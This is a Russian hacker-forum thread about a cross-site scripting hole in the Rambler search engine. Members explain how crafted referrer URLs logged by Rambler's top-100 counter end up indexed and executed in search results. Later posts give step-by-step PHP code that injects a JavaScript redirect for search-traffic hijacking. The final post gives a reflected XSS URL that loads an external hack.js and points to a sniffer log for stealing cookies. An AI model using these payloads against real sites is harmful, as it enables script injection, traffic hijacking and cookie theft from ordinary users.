Xss в рамблер.ру
 

Люди, в рамблере есть дыра, тока чё с ней делать??
суть:
Я на своём сайте делал какую то защиту от неправильных запросов к PHP , и прикола ради
поставил скрипт на открытие cd и кучу алертов за неправильный запрос...
И чё я вижу... проверяю позиции своего сайта, ввожу запрос в рамблер, он выдаёт по поиску сайты и вдруг у меня открывается крышка cd и вылетают бесконечные алерты )))
К привеликому сожалению, этой страницы уже давно нет, и чё я в ней писал не помню (теперь буду вспоминать...)
но в исходнике страницы рамблера явно написан мой скрипт в таком плане:
http://www.site.ru/page.php?id=001&bla-bla&bla-bla<script>....

Чё можно сделать, думайте сами...

Кстати ща мысль родилась:
если сделать на странице так:
<a href="http://site.ru/page.php?<script>......</script>">bla-bla</a> Может он и её проиндексирует и отобразит в поиске как есть... Эх ждать долго ((

ВСПОМНИЛ !!!!!
Я там такую херь писал:

$id=$_GET['id'];

...

$id = ereg_replace("[^0-9_]","<script>....</script>",$id);

....

echo "bla-bla-bla".$id."bla-bla-bla";

чёто в этом духе )))


Какие есть соображения?

хех, прочти: http://antichat.ru/txt/chatnarod/ . И ты скажеш что чел не знает JavaScript?

хм, молодец.хорошая статейка.

лишний раз доказывает, что в сети полно не защищённых компов. За пост - отдельно респект, если продумать, то можно и не только Cd открывать у пользователей

Интересно вроде вот xss.http://health.rambler.ru/drugs/results.html?words=%3Cscript%3Ealert%20(%27XSS%20b y%20SanyaX%27)%3C/script%3E

Да, только вот с помощью этой xss пароль от ящика угнать не получится. Ведь mail.rambler.ru и health.rambler.ru разные сервера :(

мм
 

Сервер вообщето один...
но эт ничё не меняет...

Кароч, я тут пытался разобраться, как он эту херь проиндексировал, и вот на что наткнулся:
Стоит у меня на каждой страничке счётчик рамблера, а он сволочуга регистрирует всех рефереров с которых пришли на данную страницу...
И... открыл я статистику посещений в рамблер топ-100, а там ЭТА ссылка (которой в реальности нет ! Но запрос такой был) http://site.ru/page.php?a=01&b=02&c='XSS<...>

Вместо XSS - символы которые мой ПХП скрипт заменял на мой JAVASCRIPT , короче эта якобы-ссылка попала в базу рамблера , и при запросе в поиске rambler.ru с определённым ключевым словом Выскакивает мой Javascript в рамблере......

Что с этого можно поиметь ??? И как этим воспользоваться для того, чтобы поработить вселенную - теперь будем думать ))))

Остается только найти сайт, создать страницу, поставить на нее ссылку вида <сайт>/<страница>?<код> и ждать...
Хотя я сомневаюсь, что Rambler может позволить себе такие уязвимости. Правда, если позволяет XSS в поисковых запросах - то вполне...

гы
 

Вот решил вас приколоть.....

Сделал тоже самое ( почти )

Я ж говорю, это легко, все якобы-ссылки он берёт из топ-100 , причём, я так понял, каждый день...

Вчера эмулировал ссылку с неправильным запросом на мой ПХП скрипт, И вот что получилось:

http://www.rambler.ru/srch?old_q=web...E0%E9%F2%E8%21
(17.11.2005) З.Ы. Ссылка уже не работает , т.к. страницы нет, а был алерт в рамблере -)

Это весело ))

Так что, Kanick , не сомневайся!!
Кстати, помоему, это не XSS уязвимость, а чёртиё знает какая....
Остаётся самое главное - будем думать как теперь мы поработим вселенную))

Ни черта себе! :eek:
Нет слов!

Покопаюсь-ка я тоже.

Да забавный факт нашел Dmitro. Поработаем над ним.

Как мне передали, дыра на Рамблере старая и бесперспективная. :(
Рамблер даже куки не оставляет.
Единственный возможный вариант использования - редирект на свой сайт. Что ж, отличный прием для раскрутки. ;)

Угук. Раскрутить один раз сайт на слово "работа" (ну или порно) и все. Потом кто вобьет в поиске "работа" - редиректом на сайт Дмитро будет попадать (наращивая раскрутку как снежный ком).

Дмитро - респект. Действительно откопал забавную штуку. =)

итог
 

Вообщем , чтоб было всем понятнее, делаем так:
1) В index.php пишем повыше на странице :
********************************
<?php
if(isset($_GET['ID'])){$ID = ereg_replace("[^0-9_]","<script language='Javascript'><!--
function reload() {location = \"http://ВАШ_САЙТ.ru\"}; setTimeout('reload()', 10);
//--></script>",$_GET['ID']);}
echo $ID;
echo "<br><b>".$ID."</b><br><a href=\"http://ВАШ_САЙТ/?".$ID."\">". $ID."</a>";
?>
*********************************
// Зачем три раза повторять $ID ? - Чёртиво знает, откуда рамблер его тянет, толи из ссылки, толи из тега... кашу маслом не испортишь, а там можно и поэксперементировать ))
2) Затем делаем URL запрос http://ВАШ_САЙТ.ru/?ID=[Любые буквы или символы]
желательно побольше таких запросов с разными буквами после "?"
После чего счётчик rambler top-100 на этой странице фиксирует эти запросы, ( их можно посмотреть в статистике посещений ) , затем через какое-то время их индексирует поисковик рамблера. И всё !
3) После индексации будет редирект на Ваш сайт прямо из Рамблера.
А можно сделать ещё круче, т.е. сделать действительно снежный ком !!
Создать массив слов и чисел, создать рандом переменную , состоящую из "слово+число" и добавить эту переменную в редирект, т.е.
"http://Ваш_сайт.ru/?".$random
тем самым получим цыкл...
Ну вот вроде разжевали )))

Вон кстати ребятишки чё нашли:

Источник: http://antisec.2x4.ru/advisories/rambler.txt

Еще
 

http://health.rambler.ru/drugs/results.html?words=<script>alert%20('XSS%20b%20y%2 0SNIFF')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>

Потом на http://antichat.ru/sniff/log.php